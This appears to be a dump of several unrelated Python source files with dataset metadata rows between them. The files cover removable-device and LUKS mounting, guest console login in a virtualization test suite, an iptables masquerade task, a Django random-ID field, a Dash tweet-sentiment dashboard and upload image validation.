async_.errbacks.append(partial(self._error, fn, device))
return async_
return wrapper
def _suppress_error(fn):
"""
Prevent errors in this function from being shown. This is OK, since all
errors happen in sub-functions in which errors ARE logged.
"""
@wraps(fn)
def wrapper(self, device, *args, **kwargs):
async_ = fn(self, device, *args, **kwargs)
async_.errbacks.append(lambda *args: True)
return async_
return wrapper
def _is_parent_of(parent, child):
"""Check whether the first device is the parent of the second device."""
if child.is_partition:
return child.partition_slave == parent
if child.is_toplevel:
return child.drive == parent and child != parent
return False
class Mounter(object):
"""
Mount utility.
Stores environment variables (filter, prompt, browser, udisks) to use
across multiple mount operations.
:ivar udisks: adapter to the udisks service
NOTE: The optional parameters are not guaranteed to keep their order and
should always be passed as keyword arguments.
"""
def __init__(self, udisks,
mount_options=None,
ignore_device=None,
prompt=None,
browser=None,
cache=None):
"""
Initialize mounter with the given defaults.
:param udisks: udisks service object. May be a Sniffer or a Daemon.
:param FilterMatcher filter: customize mount options and handleability
:param callable prompt: retrieve passwords for devices
:param callable browser: open devices
If prompt is None, device unlocking will not work.
If browser is None, browse will not work.
"""
self.udisks = udisks
self._mount_options = mount_options or (lambda device: None)
self._ignore_device = ignore_device or FilterMatcher([], False)
self._ignore_device._filters += [
IgnoreDevice({'is_block': False, 'ignore': True}),
IgnoreDevice({'is_external': False, 'ignore': True}),
IgnoreDevice({'is_ignored': True, 'ignore': True})]
self._prompt = prompt
self._browser = browser
self._cache = cache
self._log = logging.getLogger(__name__)
try:
# propagate error messages to UDisks1 daemon for 'Job failed'
# notifications.
self._set_error = self.udisks.set_error
except AttributeError:
self._set_error = lambda device, action, message: None
def _error(self, fn, device, err, fmt):
message = exc_message(err)
self._log.error(_('failed to {0} {1}: {2}',
fn.__name__, device, message))
self._set_error(device, fn.__name__, message)
return True
@_sets_async_error
@_find_device
def browse(self, device):
"""
Browse device.
:param device: device object, block device path or mount path
:returns: success
:rtype: bool
"""
if not device.is_mounted:
self._log.error(_("not browsing {0}: not mounted", device))
yield Return(False)
if not self._browser:
self._log.error(_("not browsing {0}: no program", device))
yield Return(False)
self._log.debug(_('opening {0} on {0.mount_paths[0]}', device))
self._browser(device.mount_paths[0])
self._log.info(_('opened {0} on {0.mount_paths[0]}', device))
yield Return(True)
# mount/unmount
@_sets_async_error
@_find_device
def mount(self, device):
"""
Mount the device if not already mounted.
:param device: device object, block device path or mount path
:returns: whether the device is mounted.
:rtype: bool
"""
if not self.is_handleable(device) or not device.is_filesystem:
self._log.warn(_('not mounting {0}: unhandled device', device))
yield Return(False)
if device.is_mounted:
self._log.info(_('not mounting {0}: already mounted', device))
yield Return(True)
fstype = str(device.id_type)
options = self._mount_options(device)
kwargs = dict(fstype=fstype, options=options)
self._log.debug(_('mounting {0} with {1}', device, kwargs))
mount_path = yield device.mount(**kwargs)
self._log.info(_('mounted {0} on {1}', device, mount_path))
yield Return(True)
@_sets_async_error
@_find_device
def unmount(self, device):
"""
Unmount a Device if mounted.
:param device: device object, block device path or mount path
:returns: whether the device is unmounted
:rtype: bool
"""
if not self.is_handleable(device) or not device.is_filesystem:
self._log.warn(_('not unmounting {0}: unhandled device', device))
yield Return(False)
if not device.is_mounted:
self._log.info(_('not unmounting {0}: not mounted', device))
yield Return(True)
self._log.debug(_('unmounting {0}', device))
yield device.unmount()
self._log.info(_('unmounted {0}', device))
yield Return(True)
# unlock/lock (LUKS)
@_sets_async_error
@_find_device
def unlock(self, device):
"""
Unlock the device if not already unlocked.
:param device: device object, block device path or mount path
:returns: whether the device is unlocked
:rtype: bool
"""
if not self.is_handleable(device) or not device.is_crypto:
self._log.warn(_('not unlocking {0}: unhandled device', device))
yield Return(False)
if device.is_unlocked:
self._log.info(_('not unlocking {0}: already unlocked', device))
yield Return(True)
if not self._prompt:
self._log.error(_('not unlocking {0}: no password prompt', device))
yield Return(False)
unlocked = yield self._unlock_from_cache(device)
if unlocked:
yield Return(True)
password = yield self._prompt(device)
if password is None:
self._log.debug(_('not unlocking {0}: cancelled by user', device))
yield Return(False)
self._log.debug(_('unlocking {0}', device))
yield device.unlock(password)
self._update_cache(device, password)
self._log.info(_('unlocked {0}', device))
yield Return(True)
@Coroutine.from_generator_function
def _unlock_from_cache(self, device):
if not self._cache:
yield Return(False)
try:
password = self._cache[device]
except KeyError:
yield Return(False)
self._log.debug(_('unlocking {0} using cached password', device))
try:
yield device.unlock(password)
except Exception:
self._log.debug(_('failed to unlock {0} using cached password', device))
yield Return(False)
self._log.debug(_('unlocked {0} using cached password', device))
yield Return(True)
def _update_cache(self, device, password):
if not self._cache:
return
self._cache[device] = password
def forget_password(self, device):
try:
del self._cache[device]
except KeyError:
pass
@_sets_async_error
@_find_device
def lock(self, device):
"""
Lock device if unlocked.
:param device: device object, block device path or mount path
:returns: whether the device is locked
:rtype: bool
"""
if not self.is_handleable(device) or not device.is_crypto:
self._log.warn(_('not locking {0}: unhandled device', device))
yield Return(False)
if not device.is_unlocked:
self._log.info(_('not locking {0}: not unlocked', device))
yield Return(True)
self._log.debug(_('locking {0}', device))
yield device.lock()
self._log.info(_('locked {0}', device))
yield Return(True)
# add/remove (unlock/lock or mount/unmount)
@_suppress_error
@_find_device
def add(self, device, recursive=False):
"""
Mount or unlock the device depending on its type.
:param device: device object, block device path or mount path
:param bool recursive: recursively mount and unlock child devices
:returns: whether all attempted operations succeeded
:rtype: bool
"""
if device.is_filesystem:
success = yield self.mount(device)
elif device.is_crypto:
success = yield self.unlock(device)
if success and recursive:
# TODO: update device
success = yield self.add(
device.luks_cleartext_holder,
recursive=True)
elif recursive and device.is_partition_table:
tasks = []
for dev in self.get_all_handleable():
if dev.is_partition and dev.partition_slave == device:
tasks.append(self.add(dev, recursive=True))
# TODO: AND results
success = yield AsyncList(tasks)
else:
self._log.info(_('not adding {0}: unhandled device', device))
yield Return(False)
yield Return(success)
@_suppress_error
@_find_device
def auto_add(self, device, recursive=False):
"""
Automatically attempt to mount or unlock a device, but be quiet if the
device is not supported.
:param device: device object, block device path or mount path
:param bool recursive: recursively mount and unlock child devices
:returns: whether all attempted operations succeeded
:rtype: bool
"""
success = True
if not self.is_handleable(device):
pass
elif device.is_filesystem:
if not device.is_mounted:
success = yield self.mount(device)
elif device.is_crypto:
if self._prompt and not device.is_unlocked:
success = yield self.unlock(device)
if success and recursive:
# TODO: update device
success = yield self.auto_add(
device.luks_cleartext_holder,
recursive=True)
elif recursive and device.is_partition_table:
tasks = []
for dev in self.get_all_handleable():
if dev.is_partition and dev.partition_slave == device:
tasks.append(self.auto_add(dev, recursive=True))
# TODO: AND results
success = yield AsyncList(tasks)
else:
self._log.debug(_('not adding {0}: unhandled device', device))
yield Return(success)
@_suppress_error
@_find_device
def remove(self, device, force=False, detach=False, eject=False,
lock=False):
"""
Unmount or lock the device depending on device type.
:param device: device object, block device path or mount path
:param bool force: recursively remove all child devices
:param bool detach: detach the root drive
:param bool eject: remove media from the root drive
:param bool lock: lock the associated LUKS cleartext slave
:returns: whether all attempted operations succeeded
:rtype: bool
"""
if device.is_filesystem:
success = yield self.unmount(device)
elif device.is_crypto:
if force and device.is_unlocked:
yield self.auto_remove(device.luks_cleartext_holder, force=True)
success = yield self.lock(device)
elif force and (device.is_partition_table or device.is_drive):
tasks = []
for child in self.get_all_handleable():
if _is_parent_of(device, child):
tasks.append(self.auto_remove(
child,
force=True,
detach=detach,
eject=eject,
lock=lock))
# TODO: AND results
success = yield AsyncList(tasks)
else:
self._log.info(_('not removing {0}: unhandled device', device))
success = False
# if these operations work, everything is fine, we can return True:
if lock and device.is_luks_cleartext:
device = device.luks_cleartext_slave
success = yield self.lock(device)
if eject:
success = yield self.eject(device)
if detach:
success = yield self.detach(device)
yield Return(success)
@_suppress_error
@_find_device
def auto_remove(self, device, force=False, detach=False, eject=False,
lock=False):
"""
Unmount or lock the device depending on device type.
:param device: device object, block device path or mount path
:param bool force: recursively remove all child devices
:param bool detach: detach the root drive
:param bool eject: remove media from the root drive
:param bool lock: lock the associated LUKS cleartext slave
:returns: whether all attempted operations succeeded
:rtype: bool
"""
success = True
if not self.is_handleable(device):
pass
elif device.is_filesystem:
if device.is_mounted:
success = yield self.unmount(device)
elif device.is_crypto:
if force and device.is_unlocked:
yield self.auto_remove(device.luks_cleartext_holder, force=True)
if device.is_unlocked:
success = yield self.lock(device)
elif force and (device.is_partition_table or device.is_drive):
tasks = []
for child in self.get_all_handleable():
if _is_parent_of(device, child):
tasks.append(self.auto_remove(
child,
force=True,
detach=detach,
eject=eject,
lock=lock))
# TODO: AND results
success = yield AsyncList(tasks)
else:
self._log.debug(_('not removing {0}: unhandled device', device))
# if these operations work, everything is fine, we can return True:
if lock and device.is_luks_cleartext:
device = device.luks_cleartext_slave
success = yield self.lock(device)
if eject and device.has_media:
success = yield self.eject(device)
if detach and device.is_detachable:
success = yield self.detach(device)
yield Return(success)
# eject/detach device
@_sets_async_error
@_find_device
def eject(self, device, force=False):
"""
Eject a device after unmounting all its mounted filesystems.
:param device: device object, block device path or mount path
:param bool force: remove child devices before trying to eject
:returns: whether the operation succeeded
:rtype: bool
"""
if not self.is_handleable(device):
self._log.warn(_('not ejecting {0}: unhandled device'))
yield Return(False)
drive = device.drive
if not (drive.is_drive and drive.is_ejectable):
self._log.warn(_('not ejecting {0}: drive not ejectable', drive))
yield Return(False)
if force:
yield self.auto_remove(drive, force=True)
self._log.debug(_('ejecting {0}', device))
yield drive.eject()
self._log.info(_('ejected {0}', device))
yield Return(True)
@_sets_async_error
@_find_device
def detach(self, device, force=False):
"""
Detach a device after unmounting all its mounted filesystems.
:param device: device object, block device path or mount path
:param bool force: remove child devices before trying to detach
:returns: whether the operation succeeded
:rtype: bool
"""
if not self.is_handleable(device):
self._log.warn(_('not detaching {0}: unhandled device', device))
yield Return(False)
drive = device.root
if not drive.is_detachable:
self._log.warn(_('not detaching {0}: drive not detachable', drive))
yield Return(False)
if force:
yield self.auto_remove(drive, force=True)
self._log.debug(_('detaching {0}', device))
yield drive.detach()
self._log.info(_('detached {0}', device))
yield Return(True)
# mount_all/unmount_all
def add_all(self, recursive=False):
"""
Add all handleable devices that available at start.
:param bool recursive: recursively mount and unlock child devices
:returns: whether all attempted operations succeeded
:rtype: bool
"""
tasks = []
for device in self.udisks:
tasks.append(self.auto_add(device, recursive=recursive))
# TODO: AND results
return AsyncList(tasks)
def remove_all(self, detach=False, eject=False, lock=False):
"""
Remove all filesystems handleable by udiskie.
:param bool detach: detach the root drive
:param bool eject: remove media from the root drive
:param bool lock: lock the associated LUKS cleartext slave
:returns: whether all attempted operations succeeded
:rtype: bool
"""
tasks = []
remove_args = dict(force=True, detach=detach, eject=eject, lock=lock)
for device in self.get_all_handleable():
if device.parent_object_path != '/':
continue
tasks.append(self.auto_remove(device, **remove_args))
# TODO: AND results
return AsyncList(tasks)
# iterate devices
def is_handleable(self, device):
# TODO: handle pathes in first argument
"""
Check whether this device should be handled by udiskie.
:param device: device object, block device path or mount path
:returns: handleability
:rtype: bool
Currently this just means that the device is removable and holds a
filesystem or the device is a LUKS encrypted volume.
"""
return not self._ignore_device(device)
def is_addable(self, device):
"""
Check if device can be added with ``auto_add``.
"""
if not self.is_handleable(device):
return False
if device.is_filesystem:
return not device.is_mounted
if device.is_crypto:
return self._prompt and not device.is_unlocked
if device.is_partition_table:
return any(self.is_addable(dev)
for dev in self.get_all_handleable()
if dev.partition_slave == device)
return False
def is_removable(self, device):
"""
Check if device can be removed with ``auto_remove``.
"""
if not self.is_handleable(device):
return False
if device.is_filesystem:
return device.is_mounted
if device.is_crypto:
return device.is_unlocked
if device.is_partition_table or device.is_drive:
return any(self.is_removable(dev)
for dev in self.get_all_handleable()
if _is_parent_of(device, dev))
return False
def get_all_handleable(self):
"""
Enumerate all handleable devices currently known to udisks.
:returns: handleable devices
:rtype: iterable
NOTE: returns only devices that are still valid. This protects from
race conditions inside udiskie.
"""
return filter(self.is_handleable, self.udisks)
# data structs containing the menu hierarchy:
Device = namedtuple('Device', ['root', 'branches', 'device', 'label', 'methods'])
Action = namedtuple('Action', ['method', 'device', 'label', 'action'])
Branch = namedtuple('Branch', ['label', 'groups'])
class DeviceActions(object):
_labels = {
'browse': _('Browse {0}'),
'mount': _('Mount {0}'),
'unmount': _('Unmount {0}'),
'unlock': _('Unlock {0}'),
'lock': _('Lock {0}'),
'eject': _('Eject {0}'),
'detach': _('Unpower {0}'),
'forget_password': _('Clear password for {0}'),
}
def __init__(self, mounter, actions={}):
self._mounter = mounter
self._actions = _actions = actions.copy()
setdefault(_actions, {
'browse': mounter.browse,
'mount': mounter.mount,
'unmount': mounter.unmount,
'unlock': mounter.unlock,
'lock': partial(mounter.remove, force=True),
'eject': partial(mounter.eject, force=True),
'detach': partial(mounter.detach, force=True),
'forget_password': mounter.forget_password,
})
def detect(self, root_device=''):
"""
Detect all currently known devices.
:param str root_device: object path of root device to return
:returns: root of device hierarchy
:rtype: Device
"""
root = Device(None, [], None, "", [])
device_nodes = dict(map(self._device_node,
self._mounter.get_all_handleable()))
# insert child devices as branches into their roots:
for object_path, node in device_nodes.items():
device_nodes.get(node.root, root).branches.append(node)
if not root_device:
return root
return device_nodes[root_device]
def _get_device_methods(self, device):
"""Return an iterable over all available methods the device has."""
if device.is_filesystem:
if device.is_mounted:
yield 'browse'
yield 'unmount'
else:
yield 'mount'
elif device.is_crypto:
if device.is_unlocked:
yield 'lock'
else:
yield 'unlock'
cache = self._mounter._cache
if cache and device in cache:
yield 'forget_password'
if device.is_ejectable and device.has_media:
yield 'eject'
if device.is_detachable:
yield 'detach'
def _device_node(self, device):
"""Create an empty menu node for the specified device."""
label = device.ui_label
# determine available methods
methods = [Action(method, device,
self._labels[method].format(label),
partial(self._actions[method], device))
for method in self._get_device_methods(device)]
# find the root device:
if device.is_partition:
root = device.partition_slave.object_path
elif device.is_luks_cleartext:
root = device.luks_cleartext_slave.object_path
else:
root = None
# in this first step leave branches empty
return device.object_path, Device(root, [], device, label, methods)
| 36.106569 | 84 | 0.598472 | 2,851 | 24,733 | 5.033322 | 0.118555 | 0.032892 | 0.030801 | 0.019233 | 0.541812 | 0.497003 | 0.45554 | 0.412404 | 0.381045 | 0.35561 | 0 | 0.003295 | 0.312781 | 24,733 | 684 | 85 | 36.159357 | 0.840972 | 0.228399 | 0 | 0.470998 | 0 | 0 | 0.079126 | 0 | 0 | 0 | 0 | 0.010234 | 0 | 1 | 0.078886 | false | 0.044084 | 0.023202 | 0 | 0.176334 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb9036fe312ab342c1385e92d9bc32ecac511198 | 7,398 | py | Python | tests/hydropper/utils/session.py | ican2002/stratorvirt | b8e9b675ae0fac9e359a2096cc818f92c4f11c30 | [
"MulanPSL-1.0"
] | 66 | 2020-10-27T02:48:24.000Z | 2022-03-05T14:24:08.000Z | tests/hydropper/utils/session.py | ican2002/stratorvirt | b8e9b675ae0fac9e359a2096cc818f92c4f11c30 | [
"MulanPSL-1.0"
] | null | null | null | tests/hydropper/utils/session.py | ican2002/stratorvirt | b8e9b675ae0fac9e359a2096cc818f92c4f11c30 | [
"MulanPSL-1.0"
] | 9 | 2020-12-27T08:06:04.000Z | 2022-02-22T11:28:34.000Z | # Copyright (c) 2021 Huawei Technologies Co.,Ltd. All rights reserved.
#
# StratoVirt is licensed under Mulan PSL v2.
# You can use this software according to the terms and conditions of the Mulan
# PSL v2.
# You may obtain a copy of Mulan PSL v2 at:
# http:#license.coscl.org.cn/MulanPSL2
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the Mulan PSL v2 for more details.
"""Create session"""
import threading
import time
import aexpect
from utils.utils_logging import TestLog
from utils.exception import ConsoleBusyError
from utils.exception import NoConsoleError
from utils.exception import LoginAuthenticationError
from utils.exception import LoginTimeoutError
from utils.exception import LoginProcessTerminatedError
LOG = TestLog.get_global_log()
def lock(function):
"""
Get the ConsoleManager lock, run the function, then release the lock.
Args:
function: Function to package.
"""
def package(*args, **kwargs):
console_manager = args[0]
if console_manager.console_lock.acquire_lock(False) is False:
raise ConsoleBusyError
try:
return function(*args, **kwargs)
finally:
console_manager.console_lock.release_lock()
return package
class ConsoleManager():
"""A class for console session communication pipeline."""
def __init__(self):
self._console = None
self.status_test_command = None
self.console_lock = threading.Lock()
@lock
def login_session(self, status_test_command, prompt, username, password, timeout):
"""Login session by handle_session()"""
self._console.set_status_test_command(status_test_command)
self.handle_session(self._console, username, password, prompt, timeout, True)
def create_session(self, status_test_command,
prompt, username, password, timeout):
"""Return a console session with itself as the manager."""
if self._console is None:
raise NoConsoleError
self.login_session(status_test_command, prompt, username, password, timeout)
return ConsoleSession(self)
def config_console(self, console):
"""Configure console"""
self._console = console
self.status_test_command = self._console.status_test_command
def close(self):
"""Close console"""
self._console.close()
@lock
def get_func(self, func, *args, **kwargs):
"""
Get the func provided by a Console.
Args:
func: function name
"""
_func = getattr(self._console, func)
return _func(*args, **kwargs)
@staticmethod
def handle_session(session, username, password, prompt, timeout=10,
debug=False):
"""
Connect to a remote host (guest) using SSH or Telnet or else.
Provide answers to each questions.
"""
password_prompt_count = 0
login_prompt_count = 0
last_chance = False
last_line = [r"[Aa]re you sure", # continue connect
r"[Pp]assword:\s*", # password:
r"(?<![Ll]ast )[Ll]ogin:\s*$", # login:
r"[Ee]nter.*username", # login:
r"[Ee]nter.*password", # password:
prompt, # prompt
r"[Ww]arning"] # Warning added RSA
output = ""
def _continue_connect(debug, session):
if debug:
LOG.debug("Got 'Are you sure...', sending 'yes'")
session.sendline("yes")
def _send_passwd(debug, session, password):
if debug:
LOG.debug("Got password prompt, sending '%s'",
password)
session.sendline(password)
def _send_username(debug, session, username):
if debug:
LOG.debug("Got username prompt, sending '%s'",
username)
session.send(username)
while True:
try:
session.sendline()
match, text = session.read_until_last_line_matches(last_line, timeout=timeout,
internal_timeout=0.5, print_func=None)
output += text
if match == 0:
_continue_connect(debug, session)
continue
if match in (1, 4):
if password_prompt_count == 0:
_send_passwd(debug, session, password)
password_prompt_count += 1
continue
raise LoginAuthenticationError("Got password prompt twice", text)
if match in (2, 3):
if login_prompt_count == 0 and password_prompt_count == 0:
_send_username(debug, session, username)
login_prompt_count += 1
continue
if login_prompt_count > 0:
raise LoginAuthenticationError("Got username prompt twice", text)
raise LoginAuthenticationError("Got username prompt after password prompt", text)
if match == 5:
if debug:
LOG.debug("Got shell prompt, logged successfully")
break
if match == 6:
if debug:
LOG.debug("Got 'Warning added RSA to known host list")
continue
except aexpect.ExpectTimeoutError as err:
# send a empty line to avoid unexpected login timeout
# because some message from linux kernel maybe impact match
if not last_chance:
time.sleep(0.5)
session.sendline()
last_chance = True
continue
raise LoginTimeoutError(err.output)
except aexpect.ExpectProcessTerminatedError as err:
raise LoginProcessTerminatedError(err.status, err.output)
return output
class ConsoleSession():
"""
The wrapper of ShellSession from aexpect.
"""
def __init__(self, manager):
self.__closed = False
self.__manager = manager
self.status_test_command = manager.status_test_command
def __repr__(self):
return "console session id <%s>" % id(self)
def run_func(self, name, *args, **kwargs):
"""
Execute console session function
Args:
name: function name. available name: is_responsive cmd_output cmd_output_safe
cmd_status_output cmd_status cmd close send sendline sendcontrol send_ctrl set_linesep
read_nonblocking read_until_output_matches read_until_last_line_matches
read_until_any_line_matches read_up_to_prompt
"""
if name == "close":
if self.__closed:
raise RuntimeError("%s is closed." % self)
self.__manager.close()
self.__closed = True
else:
return self.__manager.get_func(name, *args, **kwargs)
return None
| 36.80597 | 105 | 0.584212 | 791 | 7,398 | 5.288243 | 0.2933 | 0.026297 | 0.040641 | 0.028688 | 0.144394 | 0.041119 | 0.041119 | 0.041119 | 0.027253 | 0 | 0 | 0.006332 | 0.3382 | 7,398 | 200 | 106 | 36.99 | 0.848039 | 0.209922 | 0 | 0.124031 | 0 | 0 | 0.07416 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116279 | false | 0.131783 | 0.069767 | 0.007752 | 0.263566 | 0.007752 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bb928d74c6fbac1b81cdf25fa38e1e81ee78a19b | 378 | py | Python | src/tasks/iptable.py | comafire/st-kilda-pier | 7bc9e52124c7223043695b1686db94359b83c085 | [
"Apache-2.0"
] | 8 | 2018-07-18T04:30:08.000Z | 2019-05-25T14:16:52.000Z | src/tasks/iptable.py | comafire/st-kilda-pier | 7bc9e52124c7223043695b1686db94359b83c085 | [
"Apache-2.0"
] | null | null | null | src/tasks/iptable.py | comafire/st-kilda-pier | 7bc9e52124c7223043695b1686db94359b83c085 | [
"Apache-2.0"
] | 2 | 2018-08-03T08:17:20.000Z | 2019-05-25T14:16:54.000Z | from __future__ import with_statement
from invoke import task
import env, utils
@task(help={'eth': "public ethernet device name."})
def masquerade(c, eth):
cmd = "sudo /sbin/iptables -t nat -A POSTROUTING -o {} -j MASQUERADE".format(eth)
utils.run_with_exit(c, cmd)
cmd = "sudo /sbin/iptables -A FORWARD -i {} -j ACCEPT".format(eth)
utils.run_with_exit(c, cmd)
| 34.363636 | 85 | 0.698413 | 59 | 378 | 4.322034 | 0.576271 | 0.054902 | 0.086275 | 0.14902 | 0.227451 | 0.227451 | 0.227451 | 0.227451 | 0 | 0 | 0 | 0 | 0.164021 | 378 | 10 | 86 | 37.8 | 0.806962 | 0 | 0 | 0.222222 | 0 | 0 | 0.365079 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bb9311992acbc6d56c608130a350748dec9c8d2c | 1,116 | py | Python | idfield/fields.py | lis-space/django-idfield | 2e7b06037d22c6c862a2970efdc14b470ca92f3b | [
"MIT"
] | null | null | null | idfield/fields.py | lis-space/django-idfield | 2e7b06037d22c6c862a2970efdc14b470ca92f3b | [
"MIT"
] | null | null | null | idfield/fields.py | lis-space/django-idfield | 2e7b06037d22c6c862a2970efdc14b470ca92f3b | [
"MIT"
] | null | null | null | from django.db import models
import random
class IDField(models.Field):
def __init__(self, alphabet=None, readable=False, *args, **kwargs):
self.max_length = kwargs.get('max_length', 10)
self.readable = readable
self.alphabet = alphabet
if not self.alphabet:
if self.readable:
self.alphabet = "ABCDEFGHJKMNPQRSTUVWXYZ23456789"
else:
self.alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
super(IDField, self).__init__(*args, **kwargs)
def db_type(self, connection):
return 'char({})'.format(self.max_length)
def pre_save(self, model_instance, add):
value = super(IDField, self).pre_save(model_instance, add)
if not value:
value = ''
for i in range(0, self.max_length): value += random.choice(self.alphabet)
setattr(model_instance, self.attname, value)
return value
def formfield(self, **kwargs):
return super(IDField, self).formfield(**kwargs)
def deconstruct(self):
return super(IDField, self).deconstruct()
| 32.823529 | 85 | 0.630824 | 124 | 1,116 | 5.532258 | 0.395161 | 0.104956 | 0.093294 | 0.06414 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025424 | 0.259857 | 1,116 | 33 | 86 | 33.818182 | 0.805085 | 0 | 0 | 0 | 0 | 0 | 0.076165 | 0.060036 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0.076923 | 0.115385 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
bba1f2183a294e77712c38a933020d983a71dada | 2,432 | py | Python | apps/live_twitter_sentiment.py | VaishnaviVV/Covid19_sentiment_analysis | 6b6d0f76566bee1522eb69e407dc59d450e033b7 | [
"MIT"
] | 2 | 2021-04-13T06:12:59.000Z | 2021-07-21T14:04:45.000Z | apps/live_twitter_sentiment.py | VaishnaviVV/Covid19_sentiment_analysis | 6b6d0f76566bee1522eb69e407dc59d450e033b7 | [
"MIT"
] | null | null | null | apps/live_twitter_sentiment.py | VaishnaviVV/Covid19_sentiment_analysis | 6b6d0f76566bee1522eb69e407dc59d450e033b7 | [
"MIT"
] | 1 | 2021-06-19T09:06:38.000Z | 2021-06-19T09:06:38.000Z | #Essential Modules
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#Dashboard Modules
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objects as go
from dash.dependencies import Input, Output
import dash_table
import plotly.express as px
import datetime as dt
from io import BytesIO
from wordcloud import WordCloud
from collections import deque
import pybase64
import os
import json
import sqlite3
from unidecode import unidecode
import time
from application import app
##from apps import live_twitter_sentiment_streaming
#Twitter Modules
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
import random
import plotly
from navbar import Navbar
navs=Navbar()
conn = sqlite3.connect('twitter.db')
c = conn.cursor()
# app=dash.Dash(__name__,external_stylesheets=[dbc.themes.BOOTSTRAP])
layout=dbc.Card(
[
dbc.CardBody(
[
html.H4("Live Twitter Sentiment", className="card-title"),
dcc.Graph(id="live-graph"),
dcc.Interval(
id="graph-update",
interval=1*1000
)
]
),
],
)
X = deque(maxlen=20)
X.append(1)
Y = deque(maxlen=20)
Y.append(1)
@app.callback(Output('live-graph', 'figure'),
[Input('graph-update', 'n_intervals')])
def update_graph_scatter(input_data):
conn = sqlite3.connect('twitter.db')
c = conn.cursor()
df = pd.read_sql("SELECT * FROM sentiment ORDER BY unix DESC LIMIT 1000", conn)
# df.sort_values('unix', inplace=True)
df['sentiment_smoothed'] = df['sentiment'].rolling(int(len(df)/5)).mean()
df.dropna(inplace=True)
X = df.unix.values[:]
Y = df.sentiment_smoothed.values[:]
data = plotly.graph_objs.Scatter(
x=list(X),
y=list(Y),
name='Scatter',
mode= 'lines+markers'
)
return {'data': [data],'layout' : go.Layout(dict(xaxis={'range':[min(X),max(X)],'title':'Timestamp(ms)'},
yaxis={'range':[min(Y),max(Y)],'title':'Compound Sentiment'}
)
)
}
# if __name__=="__main__":
# application.run_server(debug=True)
| 25.87234 | 109 | 0.623766 | 298 | 2,432 | 4.97651 | 0.432886 | 0.033715 | 0.026972 | 0.033715 | 0.051247 | 0.051247 | 0.051247 | 0.051247 | 0 | 0 | 0 | 0.012311 | 0.265214 | 2,432 | 93 | 110 | 26.150538 | 0.817571 | 0.109786 | 0 | 0.057143 | 0 | 0 | 0.127087 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014286 | false | 0 | 0.4 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bba31ce3ee6b992e3cd5ca08943ddfe79b48cc83 | 1,208 | py | Python | cog/forms/forms_utils.py | downiec/COG | cea8ceac701958b6af8e272698bfb08d89f62bf4 | [
"BSD-3-Clause"
] | 6 | 2016-03-10T19:38:17.000Z | 2021-02-23T09:34:59.000Z | cog/forms/forms_utils.py | downiec/COG | cea8ceac701958b6af8e272698bfb08d89f62bf4 | [
"BSD-3-Clause"
] | 602 | 2015-01-05T16:30:08.000Z | 2021-02-02T21:44:38.000Z | cog/forms/forms_utils.py | cedadev/COG | 6167f9114c7cf0422b34fb9f5f3f07f9657a7dbe | [
"BSD-3-Clause"
] | 18 | 2015-02-12T15:50:17.000Z | 2021-04-27T16:40:36.000Z | '''
General utilities for form validation
@author: Luca Cinquini
'''
import os
import imghdr
def validate_image(form, field_name):
'''
Validates an image field that is part of a form,
before the image is uploaded to the server.
'''
cleaned_data = form.cleaned_data
image = cleaned_data.get(field_name, None)
if image is not None:
# enforce white-list of allowed extensions
extension = (os.path.splitext(image.name)[1]).lower()
if (extension != '.jpg' and extension != '.png' and extension != '.gif' and extension != '.jpeg'
and extension != '.tif' and extension != '.tiff'):
form._errors[field_name] = form.error_class(["Invalid image format: %s"%extension])
# validate image header
try:
image_type = imghdr.what(image)
print 'Validating image header: detected image type=%s' % image_type
if image_type is None:
form._errors[field_name] = form.error_class(["Invalid image type: %s" % image_type])
except Exception as e:
form._errors[field_name] = form.error_class(["Cannot validate image header: %s" % e.message])
